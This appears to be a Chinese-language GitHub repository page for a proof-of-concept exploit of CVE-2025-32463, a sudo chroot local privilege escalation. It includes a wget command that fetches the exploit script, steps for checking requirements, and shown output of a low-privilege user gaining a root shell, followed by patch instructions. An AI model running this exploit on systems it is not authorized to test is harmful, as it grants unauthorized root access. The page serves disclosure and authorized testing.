aexdyhaxor/CVE-2025-32463

GitHub: aexdyhaxor/CVE-2025-32463

针对 sudo 1.9.14-1.9.17 版本 chroot 功能的本地权限提升漏洞 PoC,可将低权限用户直接提升至 root。

Stars: 0 | Forks: 0

# CVE-2025-32463 – Sudo EoP 漏洞利用 (PoC) 及预编译库 本仓库包含 **CVE-2025-32463** 的概念验证 (PoC) 漏洞利用代码,这是由 Rich Mirch 发现的 `sudo` 本地权限提升漏洞。 ## 致谢 https://github.com/aexdyhaxor/CVE-2025-32463/ ## ⚠️ 免责声明 此 PoC 仅用于**教育和官方测试目的**。请勿在非您所有或未获得明确授权进行评估的系统上使用此代码。 ## 🔧 系统要求 - 支持 chroot 功能 (-R) 的 sudo:版本 1.9.14 至 1.9.17 - 启用了 [nsswitch](https://en.wikipedia.org/wiki/Name_Service_Switch) ## 🚀 如何运行 POC ``` wget https://github.com/aexdyhaxor/CVE-2025-32463/raw/refs/heads/main/cve202532463.sh ``` 检查当前用户是否具有低权限。 ``` :~/CVE-2025-32463$ id uid=1001(poc) gid=1001(poc) groups=1001(poc),100(users) ``` 检查系统要求 ``` :~/CVE-2025-32463$ sudo --version Sudo version 1.9.15p5 ... :~/CVE-2025-32463$ ls -al /etc/nsswitch.conf -rw-r--r-- 1 root root 526 Feb 16 20:57 /etc/nsswitch.conf ``` 运行漏洞利用程序 ``` :~/CVE-2025-32463$ bash cve202532463.sh woot! root@ubutes01:/# id uid=0(root) gid=0(root) groups=0(root),100(users),1001(poc) ``` ## 🚒 Ubuntu 24.04 LTS 修复方案 - 对于已联网的系统,只需运行 sudo apt update && sudo apt upgrade - 对于物理隔离 (Air-gapped) 的系统:您可以从这里获取最新的 sudo 软件包:https://github.com/sudo-project/sudo/releases/download/v1.9.17p1/sudo_1.9.17-2_ubu2404_amd64.deb。将软件包传输到目标系统后,只需运行: sudo dpkg -i sudo_1.9.17-2_ubu2404_amd64.deb
标签:0day, chroot, CSV导出, CVE-2025-32463, EoP, Exploit, LPE, nsswitch, PoC, Root, Sudo, SUID, Web报告查看器, 共享库劫持, 协议分析, 威胁模拟, 子域名枚举, 安全漏洞, 应用安全, 提权脚本, 暴力破解, 本地提权, 权限提升, 概念验证, 系统安全, 网络安全, 隐私保护, 预编译库